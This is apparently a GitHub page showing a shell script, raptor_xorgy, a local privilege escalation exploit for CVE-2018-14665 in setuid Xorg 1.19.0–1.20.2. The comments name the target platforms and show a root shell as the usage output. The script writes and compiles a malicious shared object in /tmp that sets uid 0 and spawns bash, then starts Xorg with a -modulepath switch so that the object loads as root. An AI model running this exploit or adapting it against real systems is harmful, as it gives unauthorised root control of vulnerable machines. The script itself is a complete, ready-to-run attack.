Permalink
Cannot retrieve contributors at this time
Join GitHub today
GitHub is home to over 28 million developers working together to host and review code, manage projects, and build software together.
Sign up
Fetching contributors…
Cannot retrieve contributors at this time
| #!/bin/sh | |
| # | |
| # raptor_xorgy - xorg-x11-server LPE via modulepath switch | |
| # Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info> | |
| # | |
| # A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission | |
| # check for -modulepath and -logfile options when starting Xorg. X server | |
| # allows unprivileged users with the ability to log in to the system via | |
| # physical console to escalate their privileges and run arbitrary code under | |
| # root privileges (CVE-2018-14665). | |
| # | |
| # This exploit variant triggers the bug in the -modulepath command line switch | |
| # to load a malicious X11 module in order to escalate privileges to root on | |
| # vulnerable systems. This technique is less invasive than exploiting the | |
| # -logfile switch, however the gcc compiler must be present in order for it to | |
| # work out of the box. Alternatively, you must use a pre-compiled malicious .so | |
| # compatible with the target system and modify the exploit accordingly. | |
| # | |
| # It works very reliably on Solaris 11.4 and should work on most vulnerable | |
| # Linux distributions (though I haven't tested it). It fails on OpenBSD due to | |
| # their Xorg privilege separation (Xenocara). On this platform you should use | |
| # raptor_xorgasm instead. | |
| # | |
| # Thanks to @alanc and @nushinde for discussing this alternative vector. | |
| # | |
| # See also: | |
| # https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm | |
| # https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm | |
| # https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html | |
| # https://nvd.nist.gov/vuln/detail/CVE-2006-0745 | |
| # | |
| # Usage: | |
| # raptor@stalker:~$ chmod +x raptor_xorgy | |
| # raptor@stalker:~$ ./raptor_xorgy | |
| # [...] | |
| # root@stalker:~# id | |
| # uid=0(root) gid=0(root) | |
| # | |
| # Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): | |
| # Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5] | |
| # Oracle Solaris 11 SPARC [untested] | |
| # CentOS Linux 7 [untested] | |
| # Red Hat Enterprise Linux 7 [untested] | |
| # Ubuntu Linux 18.10 [untested] | |
| # Ubuntu Linux 18.04 LTS [untested] | |
| # Ubuntu Linux 16.04 LTS [untested] | |
| # Debian GNU/Linux 9 [untested] | |
| # [...] | |
| # | |
| echo "raptor_xorgy - xorg-x11-server LPE via modulepath switch" | |
| echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>" | |
| echo | |
| # prepare the payload | |
| cat << EOF > /tmp/pwned.c | |
| _init() | |
| { | |
| setuid(0); | |
| setgid(0); | |
| system("/bin/bash"); | |
| } | |
| EOF | |
| # libglx.so should be a good target, refer to Xorg logs for other candidates | |
| gcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so | |
| if [ $? -ne 0 ]; then echo; echo "error: cannot compile /tmp/pwned.c"; exit; fi | |
| # trigger the bug | |
| echo "Got root?" | |
| Xorg -modulepath ",/tmp" :1 |